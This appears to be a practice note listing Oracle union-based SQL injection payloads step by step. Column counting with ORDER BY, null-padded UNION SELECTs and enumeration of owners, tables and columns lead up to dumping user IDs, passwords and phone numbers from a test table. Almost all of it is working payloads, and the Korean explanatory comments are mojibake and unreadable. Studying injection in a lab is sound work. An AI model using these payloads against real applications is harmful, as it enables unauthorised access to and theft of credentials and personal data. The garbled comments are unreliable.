' order by 3 --
' order by 7 --
# 3๋ฒ ํญ๋ชฉ์ ๋์ฉ๋ ํ์ ์ด๊ณ , 7๊ฐ์ ์ปฌ๋ผ์ ๊ฐ์ง๊ณ ์๋ค
# Union ์ค๋ณต ์ ๊ฑฐ๋ฅผ ํ๊ธฐ ๋๋ฌธ์ 3๋ฒ์งธ ์ปฌ๋ผ์ด ๋์ฉ๋ ํ์ ์ด๋ผ ๋ถ๊ฐ๋ฅ
' Union SELECT null,null,null,null,null,null,null FROM dual --
# ์ค๋ฅ ๊ณ ์น๊ธฐ
' Union All SELECT null,null,null,null,null,null,null FROM dual --
# ๋ฐ์ดํฐ ํ์ ์ด ์ผ์นํ์ง ์์ > ์ค๋ฅ
' Union All SELECT '1',null,null,null,null,null,null FROM dual --
# ์ค๋ฅ ๊ณ ์น๊ธฐ
' Union All SELECT 1,null,null,null,null,null,null FROM dual --
# ์ถ๋ ฅ ๊ฐ๋ฅํ ํฌ์ง์ ํ์ธ
'and 1=2 Union All SELECT 1,'2',null,'4',null,null,null FROM dual --
'and 1=2 Union All SELECT DISTINCT 1,owner,null,'4',null,null,null FROM ALL_tables --
# ๋์ฉ๋ ํ์ ์ด ์ค๋ณต์ ๊ฑฐ๊ฐ ๋์ด ์๋ฌ ๋ฐ์
# ์ฌ์ฉ์ ์ด๋ฆ ๋ชฉ๋กํ ์ค๋ณต ์ ๊ฑฐ
'and 1=2 Union All SELECT 1,owner,null,'4',null,null,null FROM (SELECT DISTINCT owner FROM ALL_tables) --
# table_name๊ณผ owner ์ค๋ณต ์ ๊ฑฐ ํ ์ถ๋ ฅ
'and 1=2 Union All SELECT 1,owner,null,table_name,null,null,null FROM (SELECT DISTINCT owner,table_name FROM ALL_tables) --
# ํ ์ด๋ธ ๋ชฉ๋กํ > ํ ์ด๋ธ์ ์ค๋ณต์ด ๋์ง ์๊ธฐ ๋๋ฌธ์ ์ค๋ณต ์ ๊ฑฐ ํ ํ์๊ฐ ์๋ค
'and 1=2 Union All SELECT 1,table_name,null,'4',null,null,null FROM all_tables WHERE owner='C##TEST' --
# ์ปฌ๋ผ ๋ชฉ๋กํ
'and 1=2 Union All SELECT 1,column_name,null,'4',null,null,null FROM all_tab_columns WHERE owner='C##TEST' and table_name='TEST1' --
# ๋ฐ์ดํฐ ๋ชฉ๋กํ
'and 1=2 Union All SELECT idx,id,null,pw,null,null,null FROM C##TEST.TEST1 --
# ์ฐ๊ฒฐ ์ฐ์ฐ์ ์ฌ์ฉํ์ฌ ์ฌ๋ฌ ๋ฐ์ดํฐ ํฉ์ณ์ ์กฐํํ๊ธฐ
'and 1=2 Union All SELECT idx,id||'#####'||pw,null,phone,null,null,null FROM C##TEST.TEST1 --